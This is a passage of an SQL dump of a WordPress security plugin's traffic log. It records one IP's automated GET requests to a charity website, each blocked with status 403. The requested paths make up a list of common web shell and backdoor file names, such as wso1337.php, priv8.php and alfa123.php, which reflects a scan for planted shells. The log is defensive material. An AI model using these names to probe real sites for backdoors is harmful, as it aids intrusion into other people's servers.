3.5.30729)\"}','VbAGgre64tW8MSi3os5IynHL',0,1674454561.0755,142,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QxpWrmyR4SNcutIDYUwo6HKJ',0,1674454561.9306,132,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1iWP6pJL9THqGfBFw35XtsV8',0,1674454562.7535,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DQypUuiXtHCbPoLaz8f93EAY',0,1674454563.5833,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0DmrOhBUZcVTtEsd52xNKeMg',0,1674454564.4305,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aWzUkPA3LJvpFbMf80YnOVcB',0,1674454565.2298,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kTWbHcOt60hPeYQFUfJGLuXM',0,1674454566.0989,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sT21kF5mLDduCqrV4nNzxS3Q',0,1674454566.9269,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zXcIEt1A8f9xemHY4l05D3Ls',0,1674454567.7205,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','37YImAaywU4nS5olKsLgCMNR',0,1674454568.5306,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','cG6k5x1Eb70pMFN9BzWPJQvw',0,1674454569.3189,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xWNnECeriO5hkGyUsmBDgcaJ',0,1674454570.1672,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MYvbODXKWPd91xUk0LF6Jg4f',0,1674454570.9666,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vA3yfY1Scut0IB8kCXVpR4sK',0,1674454571.8381,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','o1fmCBnVeAPMKgD9xwFbpvYz',0,1674454572.6538,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KjnZ0gqYhWV5kuQe3Ax92NJ6',0,1674454573.4664,132,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UBrh2HleRQZaOnEuP5FiqJkz',0,1674454574.3074,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4kFOo5J6fLvcWtsMRPNmxbKp',0,1674454575.0998,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','V0RXYQItuLOJ16GTr9xW3H5e',0,1674454575.9089,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SsVO8PLNxzahCHUv7Tgwfrtd',0,1674454576.7458,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ngDSP70p6auyCOvX4eh2rl9q',0,1674454577.5759,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','319H8roZAhMDptbYac6gRljF',0,1674454578.3751,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UMXo9FjSQ7KgAOVBJNpf3kW6',0,1674454579.1900,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7Mx5dX2KP1oAvSrFjcapEWNQ',0,1674454579.9789,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i01duXx5teaoNkpC9G64rfPl',0,1674454580.7920,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KuHybWNqFU1Akd2sgMXQTl6f',0,1674454581.6069,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wd6Db8Ns1BCrg7UYLcaR2l0q',0,1674454582.4220,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IZTrBvhkqQbKx4H5deSF2Jzw',0,1674454583.2101,123,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0Wbwz5lkDZHOU2xr7VgP8qet',0,1674454584.0510,139,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lEX30RpLhcYgnfMBmGtPNOSa',0,1674454584.9125,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wKtrjIx5YvaRBNd1490LOAQH',0,1674454585.7514,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EXzIiesZGf2ldC65wym1Uc4N',0,1674454586.5653,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nHcSCPQVBYuJGmvaWiq6AF58',0,1674454587.3746,116,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pwsaRZo3CYWDBMfkT7iAKrhj',0,1674454588.1882,129,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hEJRfAlFQKexpDaIjPz37yZV',0,1674454589.0374,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YVCFBQRN9yOxXvdr1qK2mo8b',0,1674454589.8254,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','56ReKLzfbWo3MrCasEI27nZ1',0,1674454590.6573,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2WfDwvbEN9hKkps4yY3lB7Xj',0,1674454591.4630,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','b8tSRrgHfX49G67LaNkCE3Mp',0,1674454592.2578,121,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5hVA4ORwbM3SymG0Qn687Jfe',0,1674454593.1058,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','614oAcfL5tkp2jUVwbIn3OvM',0,1674454593.9032,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QsIZlCH8Yn4VTcWuemxFaOLJ',0,1674454594.7555,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','roskbGtqPyEf0w2QTSpm7MRz',0,1674454595.5696,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SzOPv0QEVZGA4rCwYI2mBysK',0,1674454596.3712,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yoliWHL8VtJFNzODU1gbx0qf',0,1674454597.2134,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iXKDdOQvpLznmgRxACa29YyG',0,1674454598.0185,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QEFtv2GfPOu1T6bxSLMlVswZ',0,1674454598.8184,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GrWZv91YLjFeOXyVc7AIRTq2',0,1674454599.6380,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vpSlGJRryhuxf2KsPWtI4QZg',0,1674454600.4441,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','S1mDnkxuzI8RVAo0qXCKLb3J',0,1674454601.2630,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wUFLJZGfY0stqo6acS9XxgHl',0,1674454602.0881,122,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','4lWqLPeTzAHGM7Xgc2j9uwNo',0,1674454602.9291,123,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','z5Kl1TJHANYaOy7RM6GXtEx4',0,1674454603.7698,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tlHcIkAQ6M0PsOeR8NKzZUpd',0,1674454604.5816,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bV3EqgzUuQKfRwkAcaTJjO40',0,1674454605.3887,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KIiUlLY7aFehqPm5bj1zQDod',0,1674454606.2182,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OL37kgH8XudK2pRjDrweE1BW',0,1674454607.0414,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HPVlxCtDp6K5URJow3NQYFgL',0,1674454607.8762,146,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0Ph6OMGo2vjgr3fyp7bdKx1Z',0,1674454608.7316,124,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zg4VyvDKLn730XpojTHZIFGe',0,1674454609.6095,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','woYaUTH6qVKGkNzJc20CFp3r',0,1674454610.4169,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','eMBir6bXR9fCpPtOL7zmckUD',0,1674454611.2194,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OXYQi3CZmGTS5RyWDrfzkJnM',0,1674454612.0191,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sTPrJcSHiULudyjhwIWQZ2kD',0,1674454613.8779,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Aj3WpNQk4yMzfhwPdXEvT8JZ',0,1674454615.0114,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YhnIjVDl69eJPAaLOkNGz7Zy',0,1674454615.8091,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JFfD58KrAjXpyRo4zVHd6hZC',0,1674454616.6072,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TRNGyQ6jwcmgkus5Pt8LSH3v',0,1674454617.4271,134,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ygG6VJ92a1sZQTLCtMkH7Ijc',0,1674454618.2753,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','c5rEbeQKhLkXvtNgPVHACIDl',0,1674454619.0541,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2kebCNYSOfjEdWxaLycws0DZ',0,1674454619.8456,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GfTz26ndaCDIOSHQZipkm9Lh',0,1674454620.6380,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pD4AMZRvwaQV8ngFbSzkftCc',0,1674454621.4507,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2KEJPVYTZeFmaUw4gNnxStz3',0,1674454622.2510,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BjnFT9sb7IZpquMmWDd8hfOw',0,1674454623.0952,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IcQ9TilLyz3EfBu0qW8SO2dv',0,1674454623.8803,96,'','GET',403,0,700,0,1,'',0);
INSERT INTO `cerber_traffic` VALUES ('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','10FRYyCrafZDxjJ4wEQ5huHb',0,1674454624.6967,127,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','db9vLRX01a2khYMFODl87znm',0,1674455231.4373,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XL3rhMyW4pFCoSdDKia6lNu8',0,1674455232.2400,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ugeS9dEQwZTV5MpzqY47iCGL',0,1674455233.7797,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 